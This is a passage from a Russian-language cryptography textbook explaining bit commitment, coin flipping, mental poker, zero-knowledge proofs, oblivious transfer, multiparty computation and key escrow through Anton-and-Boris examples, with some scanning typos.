Теперь, при предсказании бита с помощью однонаправленной функции. Борису уже не обязательно генерировать какие-либо случайные битовые строки, поскольку Антон использует для предсказания однонаправленную функцию и не сможет смошенничать, составив фальшивое сообщение (S 1 S ' 2 , b') такое, что H(S 1 S 2 , b') = H(S 1 ,S 2 ,b). Антон посылает Борису случайную битовую строку S 1 чтобы у Антона не было возможности путем подбора S 1 и S 2 добиться, чтобы изменилось b и чтобы при этом было сохранено значение H(S 1 ,S 2 ,b), которое Антон ранее отослал Борису. Храня S 1 в секрете от Бориса, Антон не дает Борису вычислить значения H(S 1 ,S 2 ,b) и H(S 1 ,S 2 ,b ' ), а затем определить b, сравнив эти значения с тем, что прислал ему Антон.
Предсказание с помощью генератора псевдослучайных битовых последовательностей
Для предсказания битового значения Антон может использовать генератор псевдослучайных битовых последовательностей:
1. Борис генерирует случайную битовую строку S Б и посылает ее Антону.
2. Антон вычисляет случайное начальное значение для генератора псевдослучайных битовых последовательностей. Затем для каждого бита присланном Борисом битовой строки S Б Антон отправляет Борису либо (а) выходное значение генератора псевдослучайных битовых последовательностей, если этот бит равен 1, либо (б) результат сложения выходного значения генератора псевдослучайных битовых последовательностей со значением, предсказанным Антоном, если соответствующий бит S Б равен 0.
Когда Антон захочет раскрыть Борису свое предсказание, они должны буду: перейти к выполнению последних двух шагов протокола:
1. Антон высылает Борису случайное начальное значение, вычисленное им для генератора псевдослучайных битовых последовательностей на шаге 2.
2. Борис повторяет действия Антона, предпринятые им на шаге 2. чтобы убедиться в том, что Антон не смошенничал.
Если сгенерированная Борисом случайная битовая строка является достаточно длинной, а генератор псевдослучайных битовых последовательностей. которым пользуется Антон, в требуемой степени непредсказуем, то у Антона практически нет шансов обмануть Бориса.
Бросание монеты
Для разрешения неожиданно возникшего спорного вопроса Антон и Борис решают бросить монету. Однако и у того, и у другого при себе не оказалось ни одной. Тогда они решают "бросить" монету в уме: сначала Антон загадает, что выпадет — "орел" или "решка", а потом Борис подумает и объявит. какой стороной упала "брошенная" им монета. Спрашивается: могут ли Антон и Борис сделать это так, чтобы полностью быть уверенными в том. что никто из них не смошенничал?
Могут, если воспользуются криптографическим протоколом, который заставит их действовать таким образом, что:
Антону придется бросить монету прежде, чем Борис попытается предсказать, какой стороной она упадет;
Антон не сможет изменить результат бросания монеты после того, как услышит, на какую сторону монеты сделал свою ставку Борис;
Борис не узнает, что выпало — "орел" или "решка", до тех пор. пока не примет окончательное решение и не сообщит о нем Антону.
Бросание монеты с помощью предсказания бита
В этом случае криптографический протокол, которою должны придерживаться Антон и Борис при бросании монеты, выглядит следующим образом:
1. Антон делает предсказание битового значения в соответствии с одной из схем, описанных в разделе "Предсказание бита",
2. Борис пытается догадаться, какое значение предсказал Антон, и информирует о своей догадке Антона.
3. Антон сообщает Борису предсказанное значение. Борис выигрывает, если его догадка была правильной.
Бросание монеты с помощью однонаправленной функции
Если Антон и Борис сумеют заранее договориться об использовании конкретной однонаправленной функции f(x), криптографический протокол бросания монеты будет выглядеть так:
1. Антон выбирает случайное число х и вычисляет значение y = f(x).
2. Антон посылает у Борису.
3. Борис пытается догадаться, является ли х четным или нечетным числом. и сообщает о своей догадке Антону.
4. Антон информирует Бориса о том, какое число х он выбрал.
5. Борис проверяет, действительно ли f(x) = y, а также узнает, была ли верна его догадка.
Здесь все зависит от свойств однонаправленной функции f. Если Антон вдруг сможет найти два числа х и х' такие, что х является четным, а х' — нечетным, и при этом y = f(x) = f(x'), то Борис всегда будет в проигрыше. Необходимо также, чтобы наименее значимый бит f(x) не зависел от х. Например, если f(x) будет четным в 90 процентах всех случаев, когда х является четным, Антон будет брать верх над Борисом почти всегда.
Бросание монеты с помощью криптосистемы с открытым ключом
В этом случае от алгоритмов шифрования (Е) и расшифрования (D) требуется, чтобы они были коммутативны, т. е.:
D K1 (E K2 (E K1 (M) ) ) ) = Е К2 (М),
где К 1 и К 2 — криптографические ключи, Р — открытый текст сообщения. Для симметричных криптоалгоритмов в общем случае это условие не выполняется, однако существуют алгоритмы шифрования с открытым ключом, для которых оно верно. Последние могут быть использованы в протоколе бросания монеты:
1. Антон и Борис генерируют каждый для себя по паре ключей, состоящей из открытого и тайного ключа.
2. Антон генерирует две случайные битовые строки Р 1 и Р 2, одна из которых означает, что при бросании монеты выпал "орел", а другая — что получилась "решка".
3. При помощи своего открытого ключа Антон шифрует сначала Р 1 , а потом Р 2 , и отсылает оба полученных в результате шифрсообщения (E A (P 1 ) и E A (P 2 )) Борису.
4. Борис выбирает одно из присланных ему Антоном шифрсообшений (для этой цели Борис может воспользоваться, например, известной считалкой "Эне, бене, раба, квинтер, минтер, жаба" или сходить за советом к астрологу). Борис шифрует выбранное шифрсообщение с помощью своего открытого ключа и отсылает результат (E Б (E A (P)) , где Р — это либо Р 1 , либо Р 2 ) Антону.
5. Антон расшифровывает пришедшее от Бориса сообщение на своем тайном ключе и посылает то, что у него получилось ( D Б (E Б (P)) = E Б (P) обратно Борису.
6. Борис расшифровывает это сообщение Антона ( D Б (E Б (P)) = P) и узнает, какой стороной упала монета. Затем Борис шлет Р Антону.
7. Антон проверяет, действительно ли Р — это одна из тех двух случайных битовых строк, которые он сгенерирована на шаге 2.
8. Чтобы окончательно убедиться в честности друг друга, Антон и Борис обмениваются парами ключей, которые они сгенерировали на шаге 1.
Читателю предоставляется возможность самому доказать, что каждый из участников этого протокола немедленно обнаружит, если другой участник попытается смошенничать.
Интересно отметить, что участники протокола узнают результат подбрасывания монеты не одновременно, а по очереди. Поэтому в некоторый момент времени один из участников знает, как "легла" подброшенная монета, а другой — еще нет. А следовательно, в случае неблагоприятного исхода, тот. кто уже знает результат, может повести себя неспортивно, отказавшись от дальнейшего выполнения шагов протокола.
На практике протоколы бросания монеты часто используются для генерации сеансовых ключей. В этом случае Антон и Борис могут сгенерировать случайную битовую последовательность таким образом, что посторонние окажутся не в состоянии повлиять на ее выбор. Тем не менее при генерации сеансовых ключей с помощью протокола бросания монеты Антону и Борису все равно придется шифровать все свои сообщения, чтобы защититься от возможного подслушивания.
Игра в покер
Подобно тому, как Антон и Борис бросали монету, не имея при себе самом монеты, они могут сыграть в покер без колоды карт. Соответствующий криптографический протокол аналогичен протоколу, который помог Антону и Борису организовать бросание монеты — в обоих необходимо обеспечить, чтобы используемые алгоритмы шифрования к расшифрования были коммутативны.
Отличие между этими протоколами состоит в том, что теперь Антону требуется сгенерировать, зашифровать и отослать Борису не 2 битовых последовательности, а 52 — по числу карт в воображаемой колоде. Среди них Борис случайным образом выбирает 5 битовых последовательностей, шифрует их при помощи своего открытого ключа и посылает Антону. Антон расшифровывает полученные последовательности и шлет обратно Борису, который тоже расшифровывает их. Затем Борис выбирает еще 5 битовых последовательностей и посылает Антону, который опять их расшифровывает. В результате и у Антона, и у Бориса на руках окажется по 5 карт, которыми они и будут играть друг против друга. Если потребуется, дополнительные карты могут быть розданы обоим игрокам по той же схеме.
По окончании игры Антон и Борис открывают свои карты и обмениваются ключами, чтобы иметь возможность проверить, насколько честно они следовали правилам карточной игры. К сожалению, криптографические протоколы, предназначенные для игры в покер, устроены таким образом, что в ходе нее игроки могут слегка мошенничать. Характер этого мошенничества зависит от используемого криптоалгоритма. Например, при шифровании при помощи квадратичных вычетов играющие имеют возможность пометить несколько карт. Не бог весть что, но ведь покер — это такая игра, в которой даже небольшая порция дополнительной информации о сопернике может в конечном счете решить исход игры.
Специальные криптографические протоколы
Доказательство с нулевым разглашением конфиденциальной информации
Антон: "Я знаю пароль для входа в компьютерную сеть Центробанка, рецепт приготовления "Байкала", а также почему Ельцин всегда выглядел так, будто только что проглотил живого лягушонка!"
Борис: "Нет, не знаешь!"
Антон: "Нет, знаю!"
Борис: "Чем докажешь? "
Антон: "Хорошо, я тебе все расскажу".
Антон дол со шепчет что-то на ухо Борису.
Борис: "Действительно интересно! Надо сообщить об этом газетчикам!"
Антон: "Е-мое, как же я так лопухнулся..."
К сожалению, в обычных условиях Антон может доказать Борису что знает какую-либо тайну, единственным способом — рассказав, и чем сое ют с. суть. Но тогда Борис автоматически узнает эту тайну и сможет поведан, о ней первому встречному. Есть ли у Антона возможность помешать Борису это сделать?
Конечно есть. В первую очередь, Антону не следует доверять свою таит Борису. Но тогда как Антон сможет убедить Бориса, что действительно входит в число посвященных в эту тайну?
Антону надо воспользоваться протоколом доказательства с нулевым paзглашением конфиденциальной информации. С помощью этого протокола Антон окажется в состоянии доказать Борису, что он обладает некой секретной информацией, однако сообщать данную информацию Борису будет совсем необязательно.
Доказательство носит интерактивный характер. Борис задает Антону серию вопросов. Если Антон знает секрет, то ответит правильно на все заданные ему вопросы. Если не знает, вероятность правильного ответа на каждый из вопросов будет невелика. После примерно 10-ти вопросов Борис может твердо узнать, обманывает ли его Антон. При этом шансы Бориса извлечь для себя какую-либо полезную информацию о сути самого секрета практически равны нулю.
Протокол доказательства с нулевым разглашением конфиденциальной информации
Использование доказательства с нулевым разглашением конфиденциальной информации можно пояснить на конкретном примере. Предположим, что имеется пещера. Вход в пещеру находится в точке А, а в точке В пещера разветвляется на две половины — С и D. У пещеры есть секрет: только то;, км знает волшебные слова, может открыть дверь, расположенную между С и I).
Антону волшебные слова известны, Борису — нет. Антон хочет доказан. Борису, что знает волшебные слова, но так, чтобы Борис по-прежнему оставался в неведении относительно этих слов. Тогда Антон может воспользоваться следующим протоколом:
1. Борис стоит в точке А.
2. По своему выбору Антон подходит к двери либо со стороны точки С, либо со стороны точки D.
3. Борис перемещается в точку В.
4. Борис приказывает Антону появиться или через левый проход к двери, или через правый.
5. Антон подчиняется приказу Бориса, в случае необходимости используя волшебные слова, чтобы пройти через дверь.
6. Шаги 1—5 повторяются n раз, где n — параметр протокола.
Допустим, что у Бориса есть видеокамера, с помощью которой он фиксирует все исчезновения Антона в недрах пещеры и все его последующие появления. Если Борис покажет записи всех п экспериментов, произведенных им совместно с Антоном, могут ли эти записи послужить доказательством знания Антоном волшебных слов для другого человека (например, для Владимира)?
Вряд ли. Владимир никогда не сможет удостовериться в том, что Антон каждый раз предварительно не сообщал Борису о своих намерениях, чтобы потом Борис приказывал ему выходить именно с той стороны двери, с какой Антон зашел. Или что из сделанной видеозаписи не вырезаны все неудачные эксперименты, в ходе которых Антон не смог выполнить распоряжения Бориса.
Это означает, что Борис не в состоянии убедить Владимира, лично не присутствовавшего при проведении экспериментов в пещере, в том, что Антон действительно подтвердил свое знание секрета. А значит использованный Антоном протокол доказательства характеризуется именно нулевым разглашением конфиденциальной информации. Если Антон не знает волшебные слова, открывающие дверь в пещере, то, наблюдая за Антоном, не сможет ничего узнать и Борис. Если Антону известны волшебные слова, то Борису не поможет даже подробная видеозапись проведенных экспериментов. Во-первых, поскольку при ее просмотре Борис увидит только то, что уже видел живьем. А во-вторых, потому что практически невозможно отличить сфальсифицированную Борисом видеозапись от подлинной.
Протокол доказательства с нулевым разглашением срабатывает в силу того. что не зная волшебных слов, Антон может выходить только с той стороны, с которой зашел. Следовательно лишь в 50% всех случаев Антон сумеет обмануть Бориса, догадавшись, с какой именно стороны тот попросит его выйти. Если количество экспериментов равно n , то Антон успешно пройдет все испытания только в одном случае из 2". На практике можно ограничиться n =16. Если Антон правильно исполнит приказ Бориса во всех 16-ти случаях. значит он и правда знает секрет волшебных слов.
Пример с пещерой является наглядным, но имеет существенный изъян. Борису значительно проще проследить, как в точке В Антон поворачивает и одну сторону, а потом появляется с противоположной стороны. Протокол доказательства с нулевым разглашением здесь попросту не нужен.
Поэтому предположим, что Антону известны не какие-то там волшебные слова, типа "Сезам, откройся". Нет, Антон владеет более интересной информацией — он первым сумел найти решение этой трудно решаемой задачи. Чтобы доказать данный факт Борису, Антону совсем не обязательно всем и каждому демонстрировать свое решение. Ему достаточно применить следующий протокол доказательства с нулевым разглашением конфиденциальной информации:
1. Антон использует имеющуюся у него информацию и сгенерированное случайное число, чтобы свести трудно решаемую задачу к другой трудно решаемой задаче, изоморфной исходной задаче. Затем Антон решает эту новую задачу.
2. Антон задействует протокол предсказания бита для найденного на шаге 1 решения, чтобы впоследствии, если у Бориса возникнет необходимость ознакомиться с этим решением, Борис мог бы достоверно убедиться, что предъявленное Антоном решение действительно было получено им па шаге 1.
3. Антон показывает новую трудно решаемую задачу Борису.
4. Борис просит Антона или доказать, что две трудно решаемые задачи (старая и новая) изоморфны, или предоставить решение, которое Антон должен был найти на шаге 1, и доказать, что это действительно решение задачи, к которой Антон свел исходную задачу на том же шаге.
5. Антон выполняет просьбу Бориса.
6. Антон и Борис повторяют шаги 1—6 n раз, где n — параметр протокола.
Трудно решаемые задачи, способ сведения одной задачи к другой, а также случайные числа должны по возможности выбираться так, чтобы у Бориса не появилось никакой информации относительно решения исходной задачи .даже после многократного выполнения шагов протокола.
Не все трудно решаемые задачи могут быть использованы при доказательстве с нулевым разглашением конфиденциальной информации, однако большинство из них вполне пригодны для таких целей. Примерами могут служить отыскание в связном графе цикла Гамильтона (замкнутого пути, проходящего через все вершины графа только один раз) и определение изоморфизма графов (два графа изоморфны, если они отличаются только названиями своих вершин).
Параллельные доказательства с нулевым разглашением конфиденциальной информации
Обычный протокол доказательства с нулевым разглашением конфиденциальной информации требует, чтобы Антон и Борис последовательно повторили его шаги n раз. Можно попробовать выполнять действия, предусмотренные этим протоколом, одновременно:
1. Антон использует имеющуюся у него информацию и n сгенерированных случайных чисел, чтобы свести трудно решаемую задачу к n другим трудно решаемым задачам, изоморфным исходной задаче. Затем Антон решает эти n новых задач.
2. Антон задействует протокол предсказания бита для найденных на шаге 1 n решений, чтобы впоследствии, если у Бориса возникнет необходимость ознакомиться с этими решениями, Борис мог бы достоверно убедиться, что предъявленные Антоном решения действительно были получены им на шаге 1.
3. Антон показывает n новых трудно решаемых задач Борису.
4. Для каждой из n новых трудно решаемых задач Борис просит Антона или доказать, что она изоморфна исходной трудно решаемой задаче или предоставить решение этой задачи, которое Антон должен был найти на шаге 1, и доказать, что оно действительно является ее решением.
5. Антон выполняет все просьбы Бориса.
На первый взгляд параллельный протокол обладает тем же свойством нулевого разглашения конфиденциальной информации, что и обычный. Однако строгого доказательства этого факта еще не найдено. А пока с полной определенностью можно сказать лишь одно: некоторые интерактивные протоколы доказательства с нулевым разглашением в некоторых ситуациях можно выполнять параллельно, и от этого они не утрачивают свойство нулевого разглашения конфиденциальной информации.
Неинтерактивные протоколы доказательства с нулевым разглашением конфиденциальной информации
Постороннего человека, не участвующего в выполнении шагов интерактивного протокола доказательства с нулевым разглашением конфиденциальной информации, невозможно убедить в том, в чем в ходе реализации протокола убеждается Борис, а именно — что Антон действительно владеет конфиденциальной информацией. Чтобы преодолеть этот недостаток, потребуется применить неинтерактивный протокол, в котором вместо Бориса используется однонаправленная функция:
1. Антон использует имеющуюся у него информацию и n сгенерированных случайных чисел, чтобы свести трудно решаемую задачу к n другим трудно решаемым задачам, изоморфным исходной задаче. Затем Антон решает эти n новых задач.
2. Антон задействует протокол предсказания бита для найденных на шаге 1 n решений.
3. Антон подает n обязательств, полученных им на шаге 2, на вход однонаправленной функции.
4. Для каждой i-й трудно решаемой задачи, к которой Антон свел исходную задачу на шаге 1, он берет i-й бит значения, вычисленного с помощью однонаправленной функции, и (а) если этот бит равен 1, то Антон доказывает, что исходная и i-я задачи изоморфны, или (б) если этот бит равен 0, то Антон помешает в общедоступную базу данных решение i-й задачи, вычисленное на шаге 1.
5. Антон передает в общедоступную базу данных все обязательства, которые были получены им на шаге 2.
6. Борис, Владимир или любое другое заинтересованное лицо могут проверить правильность выполнения Антоном шагов 1—5.
Удивительно, но факт: Антон предоставляет в общее пользование данные. которые позволяют любому убедиться в том, что он владеет некоторым огретом, и которые одновременно с этим не содержат никакой информант: о сути самого секрета.
Роль Бориса в этом протоколе исполняет однонаправленная функция. Если Антон не знает решения трудно решаемой задачи, он все равно может выполнить действия; предусмотренные или пунктом (а), или пунктом (б) шага 4 протокола, но отнюдь не обоими пунктами сразу. Поэтому, чтобы смошенничать, Антону придется научиться предсказывать значения однонаправленной функции. Однако если функция действительно является однонаправленной, Антон не сможет ни догадаться, какими будут ее значения. ни повлиять на нее с тем, чтобы на ее выходе получилась нужная Анют битовая последовательность.
В отличие от интерактивного протокола, здесь требуется большее количество итераций. Поскольку генерация случайных чисел возложена на Ангина. подбором этих чисел он может попытаться добиться, чтобы на выходе одно направленной функции получилась битовая последовательность нужно: и ему вида. Ведь даже если Антон не знает решения исходной трудно решаемой задачи, он всегда в состоянии выполнить требования пли пункта (а). или пункта (б) шага 4 протокола. Тогда Антон может попытается догадаться. на какой из этих пунктов падет выбор, и выполнить шаги 1—3 протокола. А если его догадка неверна, он повторит все сначала. Именно поэтому в неинтерактивных протоколах необходим больший запас прочности, чем в интерактивных. Рекомендуется выбирать n = 64 или даже n = 128.
Доказано, что в общем случае любое математическое доказательство может быть соответствующим образом преобразовано в доказательство с пулевым разглашением конфиденциальной информации. А это означает, что теперь математику вовсе не обязательно публиковать результаты своих научных исследований. Он может доказать своим коллегам, что нашел решение каком-то математической проблемы, не раскрывая перед ними сути найденного решения.
Удостоверение личности с нулевым разглашением конфиденциальной информации
В повседневной жизни людям регулярно приходится удостоверять свою личность. Обычно они делают это путем предъявления паспортов, водительских прав, студенческих билетов и других подобных документов. Такой документ обычно имеет некоторую индивидуальную отличительную особенность, которая позволяет однозначно связать его с определенным лицом. Чаще всего это фотография, иногда — подпись, реже — отпечатки пальцев или рентгеновский снимок зубов. Можно ли делать то же самое с помощью криптографии?
Конечно. В этом случае для удостоверения личности Антона используется его тайный криптографический ключ. Применяя доказательство с нулевым разглашением конфиденциальной информации, Антон может продемонстрировать любому, что знает свой тайный ключ, и тем самым однозначно идентифицировать себя. Идея цифровой идентификации весьма заманчива и таит в себе массу разнообразных возможностей, однако у нее есть ряд существенных недостатков.
Во-первых, злоумышленник Зиновий под фальшивым предлогом может попросить Антона предъявить свое цифровое удостоверение личности. Одновременно с помощью современных средств связи Зиновий инициализирует процесс идентификации Антона совсем в другом месте и будет переадресовывать все запросы из этого места Антону, а данные им ответы — пересылать обратно. Например, Зиновий может связаться с ювелирным магазином и выдав себя за Антона, оплатить из его кармана весьма дорогую покупку.
Во-вторых, Зиновий может запросто обзавестись несколькими тайными ключами, а следовательно и заиметь соответствующее число цифровых удостоверений личности. Одно из них он использует единственный раз для финансовой аферы и больше им пользоваться не будет. Свидетелем преступления станет человек, которому Зиновий предъявит свое "одноразовое" удостоверение личности, однако доказать, что это был именно Зиновий, не удастся. Ведь предусмотрительный Зиновий никогда не удостоверял таким образом свою личность прежде. Не станет он делать этого и впредь. А свидетель сможет только показать, какое удостоверение личности было предъявлено преступником. Однозначно связать это удостоверение с личностью Зиновия будет нельзя.
В-третьих, Антон может попросить Зиновия одолжить на время его цифровое удостоверение личности. Мол, Антону надо съездить в Соединенные Штаты, а поскольку он — бывший сотрудник советской разведки, работавший против США, американское правительство наотрез отказывает ему во въездной визе. Зиновий с радостью соглашается: после отъезда Антона он сможет пойти практически на любое преступление, поскольку обзавелся "железным" алиби. С другой стороны, ничто не мешает совершить преступление Антону. Кто поверит .лепету Зиновия о том, что он одолжил свое цифровое удостоверение личности какому-то другому человеку?
Избавиться от перечисленных недостатков помогают дополнительные меры предосторожности. В первом случае мошенничество стало возможным, поскольку Зиновий, проверяя цифровое удостоверение личности Антона, мог одновременно общаться с внешним миром по телефону или по радио. Если Зиновия поместить в экранированную комнату без всяких средств связи. никакого мошенничества не было бы.
Чтобы исключить вторую форму мошенничества, необходимо ввести ограничение на количество ключей, которые человеку разрешается использовать, чтобы удостоверить свою личность (как правило, такой ключ должен существовать в единственном числе). И наконец, чтобы не допустить третий вид мошенничества, требуется либо заставить всех граждан удостоверять свою личность как можно чаще (например, у каждого фонарного столба, как это делается в тоталитарных государствах), либо дополнить средства цифровой идентификации другими идентификационными методами (например, проверкой отпечатков пальцев).
Предположим, что Борис безуспешно пытается разложить на простые множители 700-битовое число. При этом ему известно, что данное число является произведением семи 100-битовых множителей. На помощь Борису приходит Антон, который случайно знает один из множителей. Антон Предлагает Борису продать этот множитель за 1000 руб. — по 10 руб. за бит. Однако у Бориса имеются в наличии лишь 500 руб. Тогда Антон выражает желание отдать Борису 50 бит за половину цены. Борис сомневается, поскольку даже купив эти 50 бит, он все равно не сможет убедиться, что они действительно являются частью искомого множителя, пока не узнает все его биты целиком.
Чтобы выйти из тупика, Антон и Борис должны воспользоваться протоколом неосознанной передачи информации. В соответствии с ним Антон передает Борису несколько шифрованных сообщений. Борис выбирает одно из них и отсылает все сообщения обратно. Антон расшифровывает выбранное Борисом сообщение и снова отсылает Борису. При этом Антон остается в неведении относительно того, какое именно сообщение выбрал для себя Борис.
Протокол неосознанной передачи информации не решает всех проблем, которые стоят перед Антоном и Борисом, желающими заключить сделку о купле-продаже одного из множителей 700-битового числа. Чтобы сделка стала честной, Антон должен будет доказать Борису, что проданные 50 бит действительно являются частью одного из простых множителей, на которые раскладывается это число. Поэтому Антону, скорее всего, придется дополнительно воспользоваться еще и протоколом доказательства с нулевым разглашением информации.
Следующий протокол позволяет Антону послать два сообщения, одно из которых будет принято Борисом, но какое именно, Антон так и не узнает.
1. Антон генерирует две пары ключей, состоящих из открытого и тайного ключа, и отсылает оба открытых ключа Борису.
2. Борис генерирует ключ для симметричного алгоритма (например, для DES-алгоритма), шифрует этот ключ при помощи одного из открытых ключей, присланных Антоном, и отсылает обратно Антону.
3. Антон расшифровывает ключ Бориса с помощью каждого из двух своих тайных ключей, сгенерированных им на шаге 1, и получает две битовых последовательности. Одна из них является подлинным ключом для DES-алгоритма, а другая содержит произвольный набор бит.
4. Антон шифрует два сообщения по DES-алгоритму, используя в качестве ключей обе битовые последовательности, которые были получены им на шаге 3, и отсылает результаты шифрования Борису.
5. Борис расшифровывает оба присланных Антоном сообщения на ключе, сгенерированном на шаге 2, и обретает два открытых текста сообщения, один из которых представляет собой настоящую тарабарщину, а второй — содержательное послание.
Теперь у Бориса имеется одно из двух сообщений Антона, однако последний не может со всей определенностью сказать, какое именно. К сожалению, если в протоколе не предусмотреть дополнительный проверочный шаг, у Антона будет возможность смошенничать (например, зашифровать на шаге 4 два идентичных сообщения). Поэтому необходим еще один, заключительный, шаг протокола:
6. После того как отпала надобность хранить в секрете второе сообщение (к примеру, у Бориса нашлись еще 500 руб., чтобы выкупить у Антона оставшуюся половину множителя), Антон предоставляет Борису свои тайные ключи, чтобы тот мог убедиться в честности Антона.
Протокол защищен от атаки со стороны Антона, поскольку на шаге 3 Антон не в состоянии отличить произвольную битовую последовательность от подлинного ключа DES-алгоритма, сгенерированного Антоном. Протокол также обеспечивает защиту от атаки со стороны Бориса, т. к. у него нет тайных ключей Антона, чтобы определить битовую последовательность, использованную Антоном в качестве ключа DES-алгоритма для шифрования второго сообщения.
Конечно, протокол неосознанной передачи информации отнюдь не гарантирует, что Антон не пошлет Борису какие-нибудь бессмысленные послания, типа "Борис — лох" или "Мяу-мяу", вместо битов одного из семи простых множителей, на которые раскладывается исходное 700-битовое чист. Или что Борис вообще захочет с ними ознакомиться и примет участие и выполнении шагов этого протокола.
На практике протокол неосознанной передачи информации используется довольно редко. Обычно он служит в качестве одного из строительных блоков для построения других протоколов.
Иногда бывает так, что группе людей требуется совместно вычислить некоторую функцию от многих переменных. Каждый участник вычислительною процесса является источником значений одной или нескольких переменных этой функции. Результат вычислений становится известен всем членим группы, однако ни один из них не в состоянии выяснить что-либо о знамениях, поданных на вход функции другим членом группы.
Вычисление средней зарплаты
Допустим, что начальник отдела приказал своим подчиненным подсчитан, среднюю зарплату в отделе. Начальник осведомлен о зарплате любого сотрудника, но слишком занят более важными делами, чтобы отвлекаться па подобные пустяки. Каждый сотрудник прекрасно знает собственную зарплату, но категорически не желает сообщать о ней сослуживцам. Чтобы сотрудники отдела (Антон, Борис, Владимир и Георгий) смогли просуммировать свои оклады, сохранив их в тайне от других, им следует воспользоваться следующим протоколом:
1. Антон генерирует случайное число, прибавляет его к своей зарплате, шифрует полученную сумму при помощи открытого ключа Бориса и затем передает то, что у него получилось, Борису.
2. На своем тайном ключе Борис расшифровывает результат, вычисленный Антоном, прибавляет к нему свою зарплату, шифрует полученную сумму при помощи открытого ключа Владимира и затем передает то, что у него получилось, Владимиру.
3. На своем тайном ключе Владимир расшифровывает результат, вычисленный Борисом, прибавляет к нему свою зарплату, шифрует полученную сумму при помощи открытого ключа Георгия и затем передает то. что у него получилось, Георгию.
4. На своем тайном ключе Георгий расшифровывает результат, вычисленный Владимиром, прибавляет к нему свою зарплату, шифрует подученную сумму при помощи открытого ключа Антона и затем передает то. что у него получилось, Антону.
5. На своем тайном ключе Антон расшифровывает результат, вычисленный Георгием, вычитает из него случайное число, сгенерированное на шаге 1, делит на количество сотрудников отдела и получает искомую среднюю зарплату в отделе.
Точность вычисления средней зарплаты зависит от честности каждого сотрудника. Если хотя бы один из участников протокола соврет относительно своего жалованья, итоговое значение будет неверным. Особенно большими потенциальными возможностями для злоупотреблений обладает Антон. На шаге 5 он может вычесть любое число, какое только придет ему в голову, и никто не заметит подделки. Поэтому необходимо обязать Антона воспользоваться какой-либо из схем предсказания бита. Однако, если от Антона потребуется раскрыть перед всеми случайное число, сгенерированное им на шаге 1, зарплату Антона узнает Борис. Это значит, что начальнику отдела все же придется отвлечься и самому выполнить вычисления, предусмотренные шагом 2 протокола. Ведь он и так знает зарплату Антона.
Как найти себе подобного
Антон любит играть с резиновыми куклами, изготовители которых потрудились на славу, тщательно скопировав в натуральную величину определенные особенности анатомического строения женщины. А Борису нравится во всех красочных подробностях наблюдать за жизнью соседей из многоквартирного дома напротив при помощи современных оптических приспособлений. Оба тщательно скрывают свои пристрастия от родственников, друзей и коллег по работе, но очень хотели бы найти людей, которые разделяют их интересы.
Фирма "Совместные анонимные вычисления" готова оказать необходимую помощь Антону, Борису и им подобным в подборе таких же чудаков, как они сами. Сотрудники фирмы составили всеобъемлющий список всех человеческих чудачеств, каждое из которых снабжено уникальным идентификатором из семи цифр. Обратившись в фирму, Антон и Борис принимают участие в выполнении шагов некоторого протокола, после чего узнают. испытывают ли они склонность к одним и тем же чудачествам. При положительном ответе они смогут связаться друг с другом. Если ответ будет отрицательным, об их необычных пристрастиях не узнает никто, включая сотрудников "Совместных анонимных вычислений".
Протокол выглядит так:
1. Используя однонаправленную функцию, Антон преобразует 7-значный идентификатор своего чудачества в другое 7-значное число.
2. Трактуя полученное на шаге 1 число как телефонный номер, Борис набирает этот номер и оставляет его абоненту свои координаты. Если на вызов никто не отвечает или такого телефонного номера не существует. Антон применяет к нему однонаправленную функцию и получает новое семизначное число. Так продолжается до тех пор, пока кто-нибудь не ответит на телефонный звонок Антона.
3. Антон сообщает в фирму, сколько раз Борис должен применять однонаправленную функцию, чтобы получить искомый телефонный номер.
4. С помощью однонаправленной функции Борис преобразует 7-значный идентификатор своего чудачества столько раз, сколько это делал Антон. и получает 7-значное число, которое трактует как телефонный номер. Борис звонит по полученному им номеру и спрашивает, нет ли для него какой-либо информации.
Следует отметить, что Борис может предпринять атаку с выбранным открытым текстом. Узнав идентификаторы распространенных человеческих чудачеств, Борис будет по очереди перебирать их, применять к ним однонаправленную функцию и звонить по получающимся у него телефонным номерам. Поэтому необходимо сделать так, чтобы количество возможных чудачеств было достаточно велико, и подобного рода атака стала в результате неосуществимой.
С незапамятных времен одним из наиболее распространенных методов слежки является подслушивание, включающее перехват сообщений, которыми обмениваются люди, являющиеся объектами наблюдения. Сегодня, благодаря широкому распространению стойких криптосистем с открытым ключом, у преступников и террористов появилась возможность обмениваться посланиями по общедоступным каналам связи, не боясь подслушивания со стороны кого бы то ни было. В связи с этим у правоохранительных органов возникла настоятельная необходимость при определенных условиях осуществлять оперативный доступ к открытым текстам шифрованных сообщений, циркулирующих в коммерческих коммуникационных сетях.
В 1993 г. американское правительство впервые публично объявило о своих планах внедрения Стандарта шифрования данных с депонированием ключа. В соответствии с этим стандартом для шифрования данных предполагается использовать защищенную микросхему под названием Clipper, которая снабжается уникальным идентификационным номером и депонируемым ключом. Депонируемый ключ состоит из двух частей, которые раздельно хранятся в двух различных уполномоченных правительственных ведомствах. Для шифрования открытого текста сообщения микросхема генерирует сеансовый ключ. Этот ключ шифруется при помощи депонируемого ключа и в зашифрованном виде присоединяется к шифрованному тексту сообщения вместе с идентификационным номером микросхемы. В случае возникновения необходимости ознакомиться с содержанием сообщения, зашифрованного при помощи микросхемы Clipper, правоохранительным органам достаточно в установленном порядке обратиться в уполномоченные правительственные ведомства за хранящимся там депонируемым ключом, расшифровать с его помощью сеансовый ключ, а затем прочесть искомым открытый текст сообщения.
В самом общем случае Стандарт шифрования данных с депонированием ключа реализуется с помощью следующего криптографического протокола:
1. Антон генерирует пару ключей, состоящую из открытого и тайного ключа, и делит их на n частей.
2. Антон посылает каждую часть тайного ключа и соответствующую ей часть открытого ключа отдельному доверенному лицу.
3. Каждое доверенное лицо проверяет полученные от Антона части открытого и тайного ключа и помещает их на хранение в надежное место.
4. Если правоохранительные органы добиваются разрешения ознакомиться с перепиской Антона, они обращаются к его доверенным лицам и реконструируют соответствующий тайный ключ.
Существуют различные варианты протокола шифрования данных с депонированием ключа. Например, в него можно встроить пороговую схему, чтобы для восстановления тайного ключа нужно было собрать не все n , а лишь не менее m (m<n) частей этого ключа, распределенных Антоном среди своих доверенных лиц. Кроме того, протокол шифрования данных с депонированием ключа можно дополнить действиями, позаимствованными из протокола с неосознанной передачей информации, чтобы доверенные лица не знали, чей конкретно ключ они реконструируют в данный момент по просьбе правоохранительных органов.
Депонирование ключей и политика
